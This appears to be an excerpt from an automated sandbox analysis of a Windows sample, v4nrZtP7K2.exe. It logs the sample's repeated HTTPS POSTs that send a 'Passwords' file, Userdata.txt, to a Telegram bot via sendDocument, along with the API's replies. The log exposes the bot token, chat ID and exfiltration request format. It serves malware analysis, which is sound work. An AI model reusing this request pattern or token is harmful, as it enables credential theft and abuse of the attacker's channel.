                                                                                    2025-01-10 20:41:23 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 35 38 34 34 37 62 66 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd31d58447bfffContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:24 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:24 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:24 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44650,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541684,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.949798149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:25 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd31ecffd0d8f8
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 63 66 66 64 30 64 38 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd31ecffd0d8f8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:26 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:26 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 535
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:26 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44652,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541686,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.949811149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:27 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd320728293363
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 37 32 38 32 39 33 33 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd320728293363Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:28 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:28 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:28 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44654,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541687,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.949827149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:29 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd321d1ceee9b7
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 64 31 63 65 65 65 39 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd321d1ceee9b7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:29 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:29 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:29 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44656,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541689,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.949839149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:31 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd32345e9c9580
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 34 35 65 39 63 39 35 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd32345e9c9580Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:31 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:31 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:31 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44658,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541691,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.949853149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:33 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd324b8d842ff1
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 62 38 64 38 34 32 66 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd324b8d842ff1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:33 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:33 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:33 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44661,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541693,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.949865149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:35 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd32614e208786
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 31 34 65 32 30 38 37 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd32614e208786Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:35 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:35 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:35 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44663,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541695,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.949877149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:37 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd3279b2cf9e25
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
